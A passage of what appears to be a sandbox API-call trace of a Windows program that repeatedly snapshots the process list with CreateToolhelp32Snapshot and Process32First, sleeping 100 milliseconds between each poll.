lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.943] Sleep (dwMilliseconds=0x64) [0200.998] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0201.008] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.117] Sleep (dwMilliseconds=0x64) [0201.124] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0201.135] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.333] Sleep (dwMilliseconds=0x64) [0201.389] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0201.407] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.619] Sleep (dwMilliseconds=0x64) [0201.670] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0201.682] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.937] Sleep (dwMilliseconds=0x64) [0202.036] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0202.050] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.220] Sleep (dwMilliseconds=0x64) [0202.340] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0202.351] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.532] Sleep (dwMilliseconds=0x64) [0202.580] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0202.596] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.712] Sleep (dwMilliseconds=0x64) [0202.734] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0202.744] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.868] Sleep (dwMilliseconds=0x64) [0202.917] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0202.936] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.103] Sleep (dwMilliseconds=0x64) [0203.154] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0203.164] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.280] Sleep (dwMilliseconds=0x64) [0203.318] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0203.332] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.405] Sleep (dwMilliseconds=0x64) [0203.420] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0203.485] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.676] Sleep (dwMilliseconds=0x64) [0203.732] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0203.741] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.915] Sleep (dwMilliseconds=0x64) [0203.968] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0203.977] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.060] Sleep (dwMilliseconds=0x64) [0204.077] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0204.088] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.387] Sleep (dwMilliseconds=0x64) [0204.436] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0204.445] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.582] Sleep (dwMilliseconds=0x64) [0204.625] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0204.640] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.055] Sleep (dwMilliseconds=0x64) [0205.069] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0205.085] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.220] Sleep (dwMilliseconds=0x64) [0205.263] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0205.281] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.562] Sleep (dwMilliseconds=0x64) [0205.610] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0205.637] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.818] Sleep (dwMilliseconds=0x64) [0205.830] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0205.845] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.925] Sleep (dwMilliseconds=0x64) [0205.983] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0206.000] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.180] Sleep (dwMilliseconds=0x64) [0206.229] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0206.242] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.362] Sleep (dwMilliseconds=0x64) [0206.406] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0206.420] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.549] Sleep (dwMilliseconds=0x64) [0206.631] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0206.647] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.255] Sleep (dwMilliseconds=0x64) [0207.344] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0207.361] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.628] Sleep (dwMilliseconds=0x64) [0207.715] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0207.726] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.988] Sleep (dwMilliseconds=0x64) [0208.074] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0208.084] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.403] Sleep (dwMilliseconds=0x64) [0208.454] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0208.470] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.671] Sleep (dwMilliseconds=0x64) [0208.718] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0208.737] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.828] Sleep (dwMilliseconds=0x64) [0208.871] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0208.882] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.024] Sleep (dwMilliseconds=0x64) [0209.076] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0209.086] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.193] Sleep (dwMilliseconds=0x64) [0209.245] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0209.254] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.315] Sleep (dwMilliseconds=0x64) [0209.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0209.334] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.440] Sleep (dwMilliseconds=0x64) [0209.483] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0209.492] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.759] Sleep (dwMilliseconds=0x64) [0209.811] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0209.821] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0209.929] Sleep (dwMilliseconds=0x64) [0209.933] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0209.943] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.073] Sleep (dwMilliseconds=0x64) [0210.124] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0210.133] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.305] Sleep (dwMilliseconds=0x64) [0210.354] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0210.367] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.455] Sleep (dwMilliseconds=0x64) [0210.464] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0210.477] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.608] Sleep (dwMilliseconds=0x64) [0210.655] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0210.664] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.857] Sleep (dwMilliseconds=0x64) [0210.873] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0210.883] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.955] Sleep (dwMilliseconds=0x64) [0210.998] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0211.008] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.082] Sleep (dwMilliseconds=0x64) [0211.122] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0211.131] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.189] Sleep (dwMilliseconds=0x64) [0211.251] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0211.363] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.437] Sleep (dwMilliseconds=0x64) [0211.491] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0211.554] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.625] Sleep (dwMilliseconds=0x64) [0211.669] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0211.679] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0211.748] Sleep (dwMilliseconds=0x64) [0211.796] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0211.812] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.038] Sleep (dwMilliseconds=0x64) [0212.042] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0212.054] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.128] Sleep (dwMilliseconds=0x64) [0212.136] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0212.147] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.282] Sleep (dwMilliseconds=0x64) [0212.317] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0212.363] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.430] Sleep (dwMilliseconds=0x64) [0212.493] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0212.504] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.581] Sleep (dwMilliseconds=0x64) [0212.597] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0212.611] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.684] Sleep (dwMilliseconds=0x64) [0212.733] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0212.749] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.905] Sleep (dwMilliseconds=0x64) [0212.950] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0213.056] Process32First (in: hSnapshot=0x11cc, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.202] Sleep (dwMilliseconds=0x64) [0213.214] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0213.224] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.314] Sleep (dwMilliseconds=0x64) [0213.324] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0213.336] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.665] Sleep (dwMilliseconds=0x64) [0213.717] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0213.751] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.833] Sleep (dwMilliseconds=0x64) [0213.839] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0213.849] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.973] Sleep (dwMilliseconds=0x64) [0214.031] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0214.048] Process32First (in: hSnapshot=0xde8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, 